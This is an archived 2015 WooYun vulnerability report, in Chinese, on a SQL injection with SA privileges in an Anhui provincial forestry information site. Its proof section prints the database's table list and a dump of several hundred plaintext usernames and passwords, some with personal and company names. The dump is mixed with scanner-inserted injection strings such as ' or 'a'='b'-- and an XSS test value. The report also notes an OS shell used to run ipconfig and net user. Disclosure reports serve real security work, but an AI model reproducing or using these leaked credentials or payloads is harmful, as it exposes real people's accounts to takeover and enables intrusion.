当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119667

漏洞标题:安徽省某信息网存在sql注入(SA权限)

相关厂商:cncert国家互联网应急中心

漏洞作者: 萨瓦迪卡

提交时间:2015-06-11 15:50

修复时间:2015-07-27 09:42

公开时间:2015-07-27 09:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-11: 细节已通知厂商并且等待厂商处理中
2015-06-12: 厂商已经确认,细节仅向厂商公开
2015-06-22: 细节向核心白帽子及相关领域专家公开
2015-07-02: 细节向普通白帽子公开
2015-07-12: 细节向实习白帽子公开
2015-07-27: 细节向公众公开

简要描述:

此前还有文件上传漏洞,但是已经修复了。。。

详细说明:

安徽省林业信息网分布于安徽省各个省市,其存在严重SQL注入漏洞,并且是SA权限,可以执行系统命令。大量地市林业数据库信息可能被泄露可能。

漏洞证明:

各个地市的数据库:

1.png


当前库

2.png


Database: netweb_ahly
[47 tables]
+-----------------------+
| D99_CMD |
| D99_REG |
| D99_Tmp |
| Elook_Setup |
| H_Dict_Data |
| H_Service_Function |
| H_Service_Info |
| H_Service_ItemFile |
| H_Service_ItemFile |
| H_Service_ItemType |
| H_Site_AccessingTotal |
| H_Site_AccessingTotal |
| H_Site_Advertising |
| H_Site_Base |
| H_Site_Comment |
| H_Site_Down |
| H_Site_Function |
| H_Site_Info |
| H_Site_LinkAdd |
| H_Site_LinkType |
| H_Site_Mail |
| H_Site_Message |
| H_Site_ModelInfo |
| H_Site_ModelRes |
| H_Site_ModelType |
| H_Site_Research_Item |
| H_Site_Research_Item |
| H_System_Columns |
| H_System_GroupPurview |
| H_System_InfoPass |
| H_System_Orgn |
| H_System_Purview |
| H_System_Quanxian |
| H_System_Tables |
| H_System_UserGroup |
| H_System_UserGroup |
| H_System_WeiWen |
| H_service_dept |
| M_Site_Content |
| M_System_DeriveId |
| S3_Tmp |
| SB_Enterprise |
| SB_Item |
| SB_shangbao |
| count_value |
| dtproperties |
| t_jiaozhu |
+-----------------------+


数据表信息

Database: netweb_ahly
Table: SB_Enterprise
[419 entries]
+--------------------------------+----------------------------------------+
| loginName | password |
+--------------------------------+----------------------------------------+
[22:18:13] [WARNING] console output will be trimmed to last 256 rows due to larg
e table size
| yxk19591226 | yxk19591226 |
| jzlywh | yzf1234csx5678 |
| 天涯海角 | zhm664088 |
| 周德贵 | zhou7573222 |
| 270923932 | zhouyichao |
| keer_zhou8888 | zk800815 |
| zqf513658 | zqf147258369 |
| TLSTGSSLGY | zwj123123zwj |
| QDfEwF_username | ZxMDFw_password |
| mj_hailou | 000000 |
| 操乐明 | 000333 |
| 372564470 | 05585560218 |
| xnlyuy | 05597518303 |
| hqy | 100001 |
| 1111 | 1111 |
| test | 111111 |
| 112233 | 112233 |
| chushujie | 118649 |
| ZZQ654321 | 119119 |
| 冯瑞强 | 123456 |
| ahlygk | 123456@ |
| 一江小道 | 123456789 |
| 高明GM | 123456gm |
| mango | 1234asdf |
| zhoushihua | 13085602880 |
| nmssysm | 1314520 |
| chen1397 | 13979595621 |
| 石桥步生态特种养殖场 | 173528
|
| thzj | 19621003 |
| lgp1972 | 19721017 |
| gaoshanyangzhi | 19830311 |
| 13856688439 | 19840705 |
| 946081787 | 19861210aa |
| ldyq1314 | 19920223jsawyk |
| liuchenhui | 199209 |
| -999' OR Asc(1)=-1 OR '1'='2 | 2024-12-20 |
| hz8749007 | 25188 |
| czslyj | 2812528 |
| czslyj | 3057987 |
| bengbu | 3115969 |
| 水东林业站 | 3260119 |
| 天上星星 | 328328 |
| ganzhiquan | 342523 |
| chly | 369369 |
| anipyh | 3841347g |
| 414603191 | 414603191 |
| fxl.5532308 | 523878 |
| nyh999 | 551268 |
| 安徽省雪灵仙药业有限公司 | 5520685
|
| 746212246 | 5567766300 |
| jhy580515 | 580501 |
| tljqlyj733 | 5822733 |
| wuhu | 5851822 |
| 我爱家乡 | 585855 |
| lalyzl | 591015 |
| xujipu | 6080257 |
| dfdxah | 641020 |
| czstcl | 664496 |
| 2012XQ | 666666 |
| hnslyj | 6678346 |
| nishangxiaoyu | 670523 |
| fnly | 6767300 |
| XUXUSHENG | 691229 |
| stevenlun | 7026971 |
| kuaile | 716894 |
| yeying | 717825 |
| xiong68731 | 733733 |
| wangzicheng | 7696577 |
| 谢名曙 | 771123 |
| ZXB66003773 | 777507 |
| 840805531 | 789246 |
| HFGD | 795057026 |
| Cassandra | 7WEe9W6B |
| ahsbbwdyy | 8021111 |
| 管店林业总场 | 8041004
|
| linder | 82881225 |
| huqibo | 8315183 |
| bmstangyilin | 8461407 |
| tangjun | 8755192 |
| oxoxoxoxoxoxox.com | 88888 |
| 后悔 | 891104 |
| masys | 9115522wan |
| liusong | 950404 |
| tongjun | 961211961211 |
| bizhiguo | 9701014 |
| xqmcdsjx | acUn3t1x |
| admin'='admin'-- - | admin |
| admin | admin') or 'a'='a'-- |
| Samir | aeVeINPx |
| 绿城园林 | aj0540 |
| gbrkvl | amx21phW |
| atestu_username | atestu_password |
| atestu_username' or 'a'='b'-- | atestu_password' or 'a'='b'-- |
| atestu_username" or "a"="b"-- | atestu_password" or "a"="b"-- |
| Billybob | b6y8IuX1 |
| bbszlk | bb1234 |
| yyu115 | bsf2911253 |
| gjnunartu | bx0Zge4z |
| bzlyys | bz342126 |
| cbh1207 | cbh147258369 |
| ceshi | ceshi |
| 525166 | chen |
| loxqkc | cjf845xk |
| crystal100 | crystal100 |
| huadong1977 | czh19771003 |
| GTYled_username | EdSTzs_password |
| Latricia | EKFvcFUH |
| afan | fdxzhj |
| wndqikw1z | g00dPa$$w0rD |
| 1 | g00dPassw0rD1 |
| Welcome | hFBRuOAQ |
| GqJhKY_username" or "a"="b"-- | hxTsHc_password" or "a"="b"-- |
| oykthpglucd | IN7Rt5DS |
| Jalia | iOPfY6gK |
| Nash | JV8ZXp6E |
| Dhadhanqirawandt | jVJTvv8x |
| kjq088 | kjq12310329 |
| flyoawloykj | L3UAB7Ml |
| huyaqin19811025 | lgn661208 |
| liuzhen01215 | LIUzhen01215 |
| liwei407687678 | liwei7481214 |
| 李磊 | ll25656022565419ll |
| rundong | lwd906 |
| suzhou | lyjcyz |
| Qzqoch_username | nBLaqV_password |
| cadmaria | nhfd24155832 |
| Suzyn | NsKEy1Ax |
| rvjuKM_username' or 'a'='b'-- | obkPAa_password' or 'a'='b'-- |
| YvqEPF_username' or 'a'='b'-- | OoewFQ_password' or 'a'='b'-- |
| pinggu2013 | pinggu2013 |
| Simone | POTOWOmP |
| vnRtaT_username | pZCJef_password |
| xNAKSj_username" or "a"="b"-- | qCKdUD_password" or "a"="b"-- |
| qinerdong | qinqiong2hannuo |
| Sxkseq_username" or "a"="b"-- | QsBELf_password" or "a"="b"-- |
| Avari | qvfP0agu |
| ahaqzx | qwerty |
| 153577222162 | r1c551 |
| BdOguH_username" or "a"="b"-- | RjMSar_password" or "a"="b"-- |
| gRdtQG_username | ROiWTC_password |
| root | root |
| 835839452 | s123456 |
| Ice | SPDpk0Zn |
| kwechtomfkv | Ss8gOZrw |
| hOAUPT_username | tDwxcl_password |
| test | test |
| Christiana | TO6ckuh0 |
| tux | tux |
| gyxsof_username' or 'a'='b'-- | TZLPUJ_password' or 'a'='b'-- |
| gZbYio_username" or "a"="b"-- | UHCVSQ_password" or "a"="b"-- |
| Carmelita | uu25B5Zg |
| xcgWew_username' or 'a'='b'-- | uxQygE_password' or 'a'='b'-- |
| Marlie | vcJCobJ7 |
| Abdul | WBz3BSwP |
| ahhbly | wfxb73 |
| wfz1978 | wfz610625 |
| <blank> | wmfkjlbf9 |
| gcfhbwsm | wsm003426 |
| wsx1234 | wsx1234 |
| wumt | wumt022670 |
| Cfldjc_username' or 'a'='b'-- | xDSUaJ_password' or 'a'='b'-- |
| <blank> | XSStest" onmouseover=alert(4384)// x=" |
| xgcaFO_username' or 'a'='b'-- | YCiIVl_password' or 'a'='b'-- |
| IGescB_username" or "a"="b"-- | YClHoX_password" or "a"="b"-- |
| Lynn | YCUuLY4n |
| 宁国奕盛力 | yishengli |
| yahbbzx | YRV0fnuz |
| ngyishengli | ysl4675777 |
| yutian1973 | yutian1973 |
| yxk19591226 | yxk19591226 |
| jzlywh | yzf1234csx5678 |
| 天涯海角 | zhm664088 |
| 周德贵 | zhou7573222 |
| 270923932 | zhouyichao |
| keer_zhou8888 | zk800815 |
| zqf513658 | zqf147258369 |
| TLSTGSSLGY | zwj123123zwj |
| QDfEwF_username | ZxMDFw_password |
| mj_hailou | 000000 |
| 操乐明 | 000333 |
| 372564470 | 05585560218 |
| xnlyuy | 05597518303 |
| hqy | 100001 |
| 1111 | 1111 |
| test | 111111 |
| 112233 | 112233 |
| chushujie | 118649 |
| ZZQ654321 | 119119 |
| 冯瑞强 | 123456 |
| ahlygk | 123456@ |
| 一江小道 | 123456789 |
| 高明GM | 123456gm |
| mango | 1234asdf |
| zhoushihua | 13085602880 |
| nmssysm | 1314520 |
| chen1397 | 13979595621 |
| 石桥步生态特种养殖场 | 173528
|
| thzj | 19621003 |
| lgp1972 | 19721017 |
| gaoshanyangzhi | 19830311 |
| 13856688439 | 19840705 |
| 946081787 | 19861210aa |
| ldyq1314 | 19920223jsawyk |
| liuchenhui | 199209 |
| -999' OR Asc(1)=-1 OR '1'='2 | 2024-12-20 |
| hz8749007 | 25188 |
| czslyj | 2812528 |
| czslyj | 3057987 |
| bengbu | 3115969 |
| 水东林业站 | 3260119 |
| 天上星星 | 328328 |
| ganzhiquan | 342523 |
| chly | 369369 |
| anipyh | 3841347g |
| 414603191 | 414603191 |
| fxl.5532308 | 523878 |
| nyh999 | 551268 |
| 安徽省雪灵仙药业有限公司 | 5520685
|
| 746212246 | 5567766300 |
| jhy580515 | 580501 |
| tljqlyj733 | 5822733 |
| wuhu | 5851822 |
| 我爱家乡 | 585855 |
| lalyzl | 591015 |
| xujipu | 6080257 |
| dfdxah | 641020 |
| czstcl | 664496 |
| 2012XQ | 666666 |
| hnslyj | 6678346 |
| nishangxiaoyu | 670523 |
| fnly | 6767300 |
| XUXUSHENG | 691229 |
| stevenlun | 7026971 |
| kuaile | 716894 |
| yeying | 717825 |
| xiong68731 | 733733 |
| wangzicheng | 7696577 |
| 谢名曙 | 771123 |
| ZXB66003773 | 777507 |
| 840805531 | 789246 |
| HFGD | 795057026 |
| Cassandra | 7WEe9W6B |
| ahsbbwdyy | 8021111 |
| 管店林业总场 | 8041004
|
| linder | 82881225 |
| huqibo | 8315183 |
| bmstangyilin | 8461407 |
| tangjun | 8755192 |
| oxoxoxoxoxoxox.com | 88888 |
| 后悔 | 891104 |
| masys | 9115522wan |
| liusong | 950404 |
| tongjun | 961211961211 |
| bizhiguo | 9701014 |
| xqmcdsjx | acUn3t1x |
| admin'='admin'-- - | admin |
+--------------------------------+----------------------------------------+


--so-shell

3.png


ipconfig

4.png


net user

5.png


修复方案:

过滤参数的恶意字符;

版权声明:转载请注明来源 萨瓦迪卡@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-06-12 09:41

厂商回复:

漏洞重复,不再重复处置

最新状态:

暂无